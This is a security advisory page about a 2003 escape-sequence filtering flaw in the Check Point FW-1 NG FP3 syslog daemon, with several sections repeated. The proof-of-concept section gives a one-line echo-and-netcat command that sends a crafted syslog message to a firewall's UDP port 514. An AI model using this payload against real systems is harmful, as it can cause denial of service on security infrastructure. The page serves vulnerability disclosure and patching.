Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence Vulnerability
BID:7161
Info
Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence Vulnerability
| Bugtraq ID: | 7161 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 21 2003 12:00AM |
| Updated: | Mar 21 2003 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to "Dr. Peter Bieringer" <[email protected]>. |
| Vulnerable: |
Check Point Software Next Generation FP3 HF2 Check Point Software Next Generation FP3 HF1 Check Point Software Next Generation FP3 |
| Not Vulnerable: | |
Discussion
Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence Vulnerability
An issue has been discovered in Check Point FW-1 syslog daemon when attempting to process a malicious, remotely supplied, syslog message. Specifically, some messages containing escape sequences are not properly filtered out. This may result in unpredictable behaviour by the Check Point syslog daemon.
The technical details regarding this issue are currently unknown. This BID will be updated when further information becomes available.
An issue has been discovered in Check Point FW-1 syslog daemon when attempting to process a malicious, remotely supplied, syslog message. Specifically, some messages containing escape sequences are not properly filtered out. This may result in unpredictable behaviour by the Check Point syslog daemon.
The technical details regarding this issue are currently unknown. This BID will be updated when further information becomes available.
Exploit / POC
Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence Vulnerability
The following proof of concept was provided:
[attacker]# echo -e "<189>19: 00:01:04:
Test\a\033[2J\033[2;5m\033[1;31mHACKER~
ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
The following proof of concept was provided:
[attacker]# echo -e "<189>19: 00:01:04:
Test\a\033[2J\033[2;5m\033[1;31mHACKER~
ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
Solution / Fix
Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence Vulnerability
Solution:
Check Point has made fixes for this issue available. For additional details, see the referenced advisory URL.
Solution:
Check Point has made fixes for this issue available. For additional details, see the referenced advisory URL.
References
Check Point FW-1 Syslog Daemon Unfiltered Escape Sequence Vulnerability
References:
References:
- Check Point FW-1 NG FP3 & FP3 HF1: DoS attack against syslog daemon (AERAsec)
- Check Point FW-1 NG FP3 & FP3 HF1: DoS attack against syslog daemon possible (Dr. Peter Bieringer [email protected] )
- Next Generation Feature Pack 3 Hotfix (Check Point Software)
- syslog connections (Check Point Software)